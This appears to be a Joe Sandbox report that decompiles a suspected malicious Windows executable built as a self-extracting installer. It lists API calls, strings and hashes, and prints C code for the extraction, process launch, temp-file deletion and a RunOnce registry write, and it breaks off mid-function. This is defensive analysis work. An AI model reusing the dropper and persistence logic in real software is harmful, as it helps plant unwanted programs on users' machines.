                                                                                                                                                                                                                                    • PendingFileRenameOperations, xrefs: 004025C3
                                                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager, xrefs: 004025A8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                    • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                    • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                    • Opcode ID: c2d3288791866de7610645414065337d80aaeaca1c7ddf0c8aceb1b598e70452
                                                                                                                                                                                                                                    • Instruction ID: 778f9ec0fea580b62285155236816de8bc499f761098cae054ab7690dd904a70
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2d3288791866de7610645414065337d80aaeaca1c7ddf0c8aceb1b598e70452
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31118235902228BBDF209B919E0DDFB7E7CDF017A5F104076B808B21C0D6B44E48D6A9
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph (graph image not reproduced in the text extraction; legend: Executed / Not Executed; basic blocks 406a60-406c3e with calls to GetStartupInfoW, Sleep, _amsg_exit, _initterm, _ismbblead, _cexit and exit)
                                                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                                                    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                    				signed int* _t25;
                                                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                                                    				signed char _t41;
                                                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				E00407155();
                                                                                                                                                                                                                                    				_push(0x58);
                                                                                                                                                                                                                                    				_push(0x4072b8);
                                                                                                                                                                                                                                    				E00407208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                    				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                    				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                    				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                    				_t53 = 0;
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                    					if(0 == 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(0 != _t56) {
                                                                                                                                                                                                                                    						Sleep(0x3e8);
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t58 = 1;
                                                                                                                                                                                                                                    						_t53 = 1;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                    					_t67 =  *0x4088b0 - _t58; // 0x2
                                                                                                                                                                                                                                    					if(_t67 != 0) {
                                                                                                                                                                                                                                    						__eflags =  *0x4088b0; // 0x2
                                                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                                                    							 *0x4081e4 = _t58;
                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *0x4088b0 = _t58;
                                                                                                                                                                                                                                    							__eflags = E00406C3F(0x4010b8, 0x4010c4);
                                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                                    								goto L13;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                    								_t30 = 0xff;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_push(0x1f);
                                                                                                                                                                                                                                    						L00406FF4();
                                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                                    						_t68 =  *0x4088b0 - _t58; // 0x2
                                                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                                                    							_push(0x4010b4);
                                                                                                                                                                                                                                    							_push(0x4010ac);
                                                                                                                                                                                                                                    							L00407202();
                                                                                                                                                                                                                                    							 *0x4088b0 = 2;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_t53 == 0) {
                                                                                                                                                                                                                                    							 *0x4088ac = 0;
                                                                                                                                                                                                                                    						}
            _t71 =  *0x4088b4;
            if( *0x4088b4 != 0 && E00407060(_t71, 0x4088b4) != 0) {
                _t60 =  *0x4088b4; // 0x0
                 *0x40a288(0, 2, 0);
                 *_t60();
            }
            _t25 = __imp___acmdln; // 0x74895b9c
            _t59 =  *_t25;
             *(_t62 - 0x1c) = _t59;
            _t54 =  *(_t62 - 0x20);
            while(1) {
                _t41 =  *_t59;
                if(_t41 > 0x20) {
                    goto L32;
                }
                if(_t41 != 0) {
                    if(_t54 != 0) {
                        goto L32;
                    } else {
                        while(_t41 != 0 && _t41 <= 0x20) {
                            _t59 = _t59 + 1;
                             *(_t62 - 0x1c) = _t59;
                            _t41 =  *_t59;
                        }
                    }
                }
                __eflags =  *(_t62 - 0x3c) & 0x00000001;
                if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                    _t29 = 0xa;
                } else {
                    _t29 =  *(_t62 - 0x38) & 0x0000ffff;
                }
                _push(_t29);
                _t30 = E00402BFB(0x400000, 0, _t59); // executed
                 *0x4081e0 = _t30;
                __eflags =  *0x4081f8;
                if( *0x4081f8 == 0) {
                    exit(_t30); // executed
                    goto L32;
                }
                __eflags =  *0x4081e4;
                if( *0x4081e4 == 0) {
                    __imp___cexit();
                    _t30 =  *0x4081e0; // 0x80070002
                }
                 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                goto L40;
                L32:
                __eflags = _t41 - 0x22;
                if(_t41 == 0x22) {
                    __eflags = _t54;
                    _t15 = _t54 == 0;
                    __eflags = _t15;
                    _t54 = 0 | _t15;
                     *(_t62 - 0x20) = _t54;
                }
                _t26 = _t41 & 0x000000ff;
                __imp___ismbblead(_t26);
                __eflags = _t26;
                if(_t26 != 0) {
                    _t59 = _t59 + 1;
                    __eflags = _t59;
                     *(_t62 - 0x1c) = _t59;
                }
                _t59 = _t59 + 1;
                 *(_t62 - 0x1c) = _t59;
            }
        }
        L40:
        return E0040724D(_t30);
    }
    _t58 = 1;
    __eflags = 1;
    goto L7;
}
                                                                                                                                                                                                                                    0x00406b8d
                                                                                                                                                                                                                                    0x00406b90
                                                                                                                                                                                                                                    0x00406b90
                                                                                                                                                                                                                                    0x00406b83
                                                                                                                                                                                                                                    0x00406b81
                                                                                                                                                                                                                                    0x00406b94
                                                                                                                                                                                                                                    0x00406b98
                                                                                                                                                                                                                                    0x00406ba2
                                                                                                                                                                                                                                    0x00406b9a
                                                                                                                                                                                                                                    0x00406b9a
                                                                                                                                                                                                                                    0x00406b9a
                                                                                                                                                                                                                                    0x00406ba3
                                                                                                                                                                                                                                    0x00406bab
                                                                                                                                                                                                                                    0x00406bb0
                                                                                                                                                                                                                                    0x00406bb5
                                                                                                                                                                                                                                    0x00406bbc
                                                                                                                                                                                                                                    0x00406bbf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406bbf
                                                                                                                                                                                                                                    0x00406c1e
                                                                                                                                                                                                                                    0x00406c25
                                                                                                                                                                                                                                    0x00406c27
                                                                                                                                                                                                                                    0x00406c2d
                                                                                                                                                                                                                                    0x00406c2d
                                                                                                                                                                                                                                    0x00406c32
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00406bc5
                                                                                                                                                                                                                                    0x00406bc5
                                                                                                                                                                                                                                    0x00406bc8
                                                                                                                                                                                                                                    0x00406bcc
                                                                                                                                                                                                                                    0x00406bce
                                                                                                                                                                                                                                    0x00406bce
                                                                                                                                                                                                                                    0x00406bd1
                                                                                                                                                                                                                                    0x00406bd3
                                                                                                                                                                                                                                    0x00406bd3
                                                                                                                                                                                                                                    0x00406bd6
                                                                                                                                                                                                                                    0x00406bda
                                                                                                                                                                                                                                    0x00406be1
                                                                                                                                                                                                                                    0x00406be3
                                                                                                                                                                                                                                    0x00406be5
                                                                                                                                                                                                                                    0x00406be5
                                                                                                                                                                                                                                    0x00406be6
                                                                                                                                                                                                                                    0x00406be6
                                                                                                                                                                                                                                    0x00406be9
                                                                                                                                                                                                                                    0x00406bea
                                                                                                                                                                                                                                    0x00406bea
                                                                                                                                                                                                                                    0x00406b74
                                                                                                                                                                                                                                    0x00406c39
                                                                                                                                                                                                                                    0x00406c3e
                                                                                                                                                                                                                                    0x00406c3e
                                                                                                                                                                                                                                    0x00406abe
                                                                                                                                                                                                                                    0x00406abe
                                                                                                                                                                                                                                    0x00000000

APIs
  • Part of subcall function 00407155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00407182
  • Part of subcall function 00407155: GetCurrentProcessId.KERNEL32 ref: 00407191
  • Part of subcall function 00407155: GetCurrentThreadId.KERNEL32 ref: 0040719A
  • Part of subcall function 00407155: GetTickCount.KERNEL32 ref: 004071A3
  • Part of subcall function 00407155: QueryPerformanceCounter.KERNEL32(?), ref: 004071B8
• GetStartupInfoW.KERNEL32(?,004072B8,00000058), ref: 00406A7F
• Sleep.KERNEL32(000003E8), ref: 00406AB4
• _amsg_exit.MSVCRT ref: 00406AC9
• _initterm.MSVCRT ref: 00406B1D
• __IsNonwritableInCurrentImage.LIBCMT ref: 00406B49
• exit.KERNELBASE ref: 00406BBF
• _ismbblead.MSVCRT ref: 00406BDA
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
• String ID:
• API String ID: 836923961-0
• Opcode ID: 23f8bd3fb82f9f3920aac8045ba76bf5d17e43c9f1484d607dcc2f0c82561cbd
• Instruction ID: 9f93abb3083409938a6c880a1f3258a823be3681a554c64202715cd4aa4e3ace
• Opcode Fuzzy Hash: 23f8bd3fb82f9f3920aac8045ba76bf5d17e43c9f1484d607dcc2f0c82561cbd
• Instruction Fuzzy Hash: 2741C4719443258BEB21AB689A0476B77F4AB44720F25403FE883F73D1CF7C58618A9E
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                    control_flow_graph 631 4058c8-4058d5 632 4058d8-4058dd 631->632 632->632 633 4058df-4058f1 LocalAlloc 632->633 634 4058f3-405901 call 4044b9 633->634 635 405919-405959 call 401680 call 40658a CreateFileA LocalFree 633->635 639 405906-405910 call 406285 634->639 635->639 645 40595b-40596c CloseHandle GetFileAttributesA 635->645 644 405912-405918 639->644 645->639 646 40596e-405970 645->646 646->639 647 405972-40597b 646->647 647->644
                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                    			E004058C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                    				signed char _t16;
                                                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                                                                                                                    				CHAR* _t33;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_t33 = __ecx;
                                                                                                                                                                                                                                    				_t27 = __ecx;
                                                                                                                                                                                                                                    				_t23 = __ecx + 1;
                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                    					_t6 =  *_t27;
                                                                                                                                                                                                                                    					_t27 = _t27 + 1;
                                                                                                                                                                                                                                    				} while (_t6 != 0);
                                                                                                                                                                                                                                    				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                    				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00401680(_t20, _t36, _t33);
					E0040658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x409124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x409124 = E00406285();
					_t14 = 0;
				}
				return _t14;
			}

APIs
• LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004058E7
• CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405943
• LocalFree.KERNEL32(00000000,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040594D
• CloseHandle.KERNEL32(00000000,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040595C
• GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405963
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
• API String ID: 747627703-2139698323
• Opcode ID: 19bced661d23b48288e7b252ec9bc7e0d1aaf31755be21c792b5c023435c06d0
• Instruction ID: b28bd581754d51eb60e6e201e72a6d4170e8326a15d096e72f08d1eb5dd15189
• Opcode Fuzzy Hash: 19bced661d23b48288e7b252ec9bc7e0d1aaf31755be21c792b5c023435c06d0
• Instruction Fuzzy Hash: FA1126B16002106BD7242F7A6C4DB9B7E9DDF85364B10463AB90AF32D1CA788C2586AC
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph for E00403FEF not reproduced; nodes are marked Executed / Not Executed)
C-Code - Quality: 84%
			E00403FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x408004; // 0x8f135e3b
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00406CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x409124 = E00406285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E004044B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x408a28; // 0x0
                                                                                                                                                                                                                                    				if(_t53 == 0) {
                                                                                                                                                                                                                                    					_t34 =  *0x409a2c; // 0x0
                                                                                                                                                                                                                                    					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                    						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                    						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                    							 *0x409a2c = _t44;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				E0040411B(_t34, _t44);
                                                                                                                                                                                                                                    				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                    				CloseHandle(_v544);
                                                                                                                                                                                                                                    				if(( *0x409a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}



















APIs
• CreateProcessA.KERNELBASE ref: 00404033
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404049
• GetExitCodeProcess.KERNELBASE ref: 0040405C
• CloseHandle.KERNEL32(?), ref: 0040409C
• CloseHandle.KERNEL32(?), ref: 004040A8
• GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 004040DC
• FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 004040E9
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
• String ID:
• API String ID: 3183975587-0
• Opcode ID: c33a7784897af704f97ccb375b736f5f528657ed17549b8f0599f9aa640b82fa
• Instruction ID: f55851d03d85abb9b2f3690b68a1bd7c8abf884a38cd72d7ac8736cd390e9c04
• Opcode Fuzzy Hash: c33a7784897af704f97ccb375b736f5f528657ed17549b8f0599f9aa640b82fa
• Instruction Fuzzy Hash: 3431ADB1640218ABEB209F65DD4CFAB7778EBD4714F1041BAFA45F62A1CA344C81CE29
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E004051E5(void* __eflags) {
                                                                                                                                                                                                                                    				int _t5;
                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t1 = E0040468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                    				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                    				if(_t28 != 0) {
                                                                                                                                                                                                                                    					if(E0040468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                    						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                    						if(_t5 != 0) {
                                                                                                                                                                                                                                    							_t6 = E004044B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                    							LocalFree(_t28);
                                                                                                                                                                                                                                    							if(_t6 != 6) {
                                                                                                                                                                                                                                    								 *0x409124 = 0x800704c7;
                                                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							 *0x409124 = 0;
                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                    							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x409124 = 0x80070714;
					goto L10;
				}
				E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x409124 = E00406285();
				goto L10;
			}


APIs
  • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
  • Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
  • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
  • Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
  • Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
  • Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
  • Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00402F4D,?,00000002,00000000), ref: 00405201
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00405250
  • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
  • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
  • Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
• String ID: <None>$UPROMPT
• API String ID: 957408736-2980973527
• Opcode ID: e3db67eab3910edaea3737147de99a2175cce266038d5d97a37fd31f5e8d6ee5
• Instruction ID: 09f94c95ee8dde742b6e9a7adb48e62a9eab8c8aba96d5021a361f4290a7392f
• Opcode Fuzzy Hash: e3db67eab3910edaea3737147de99a2175cce266038d5d97a37fd31f5e8d6ee5
• Instruction Fuzzy Hash: 2211E2B5300205ABE3286B725E49F3B619DDFC8394B10447FBB02F62E0DABD8C11492D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
			E004052B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x408004; // 0x8f135e3b
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x4091e0; // 0x4f6d228
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x408a24 == 0 &&  *0x409a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t2 =  &(_t31[1]); // 0x4f6d218
						_t31 =  *_t2;
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x408a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x408a24 == 0 &&  *0x409a30 == 0) {
					_push(_t22);
					E00401781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
					if(( *0x409a34 & 0x00000020) != 0) {
						E004065E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00402390( &_v268);
					_t11 =  *0x408a20; // 0x0
				}
				if( *0x409a40 != 1 && _t11 != 0) {
					_t11 = E00401FE1(_t22); // executed
				}
				 *0x408a20 =  *0x408a20 & 0x00000000;
				return E00406CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

                                                                                                                                                                                                                                    0x0040530c
                                                                                                                                                                                                                                    0x00405312
                                                                                                                                                                                                                                    0x00405316
                                                                                                                                                                                                                                    0x00405316
                                                                                                                                                                                                                                    0x00405317
                                                                                                                                                                                                                                    0x0040531c
                                                                                                                                                                                                                                    0x0040531f
                                                                                                                                                                                                                                    0x00405333
                                                                                                                                                                                                                                    0x00405345
                                                                                                                                                                                                                                    0x00405351
                                                                                                                                                                                                                                    0x00405359
                                                                                                                                                                                                                                    0x00405359
                                                                                                                                                                                                                                    0x00405363
                                                                                                                                                                                                                                    0x00405369
                                                                                                                                                                                                                                    0x0040536f
                                                                                                                                                                                                                                    0x00405374
                                                                                                                                                                                                                                    0x00405374
                                                                                                                                                                                                                                    0x00405381
                                                                                                                                                                                                                                    0x00405387
                                                                                                                                                                                                                                    0x00405387
                                                                                                                                                                                                                                    0x0040538f
                                                                                                                                                                                                                                    0x004053a0

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(04F6D228,00000080,?,00000000), ref: 004052F2
                                                                                                                                                                                                                                    • DeleteFileA.KERNELBASE(04F6D228), ref: 004052FA
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(04F6D228,?,00000000), ref: 00405305
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(04F6D228), ref: 0040530C
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(004011FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00405363
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00405334
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                    • API String ID: 2833751637-2312194364
                                                                                                                                                                                                                                    • Opcode ID: 0ac7930ffb9e2ea93b9501b38ef617429c3f56ca169f26fd8768bff6fd321f03
                                                                                                                                                                                                                                    • Instruction ID: a399f6850f9857e4a2a636118a1f1a303e38fc590d24b9381051fc2fad193b26
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ac7930ffb9e2ea93b9501b38ef617429c3f56ca169f26fd8768bff6fd321f03
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43217C31600618DBDB24AB24EE09B6A77A4EB14754F04017EE882766E1CBB85D94CF5C
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
			E00401FE1(void* __ecx) {
				void* _v8;   /* HKEY filled in by RegOpenKeyExA */
				long _t4;    /* LSTATUS of RegOpenKeyExA; decompiler output leaves it uninitialised when the global below is zero */

				/* Only runs when the global at 0x408530 is non-zero (its meaning is not recoverable from this listing). */
				if( *0x408530 != 0) {
					/* 0x80000002 = HKEY_LOCAL_MACHINE; 0x20006 = KEY_WRITE (READ_CONTROL | KEY_SET_VALUE | KEY_CREATE_SUB_KEY). */
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
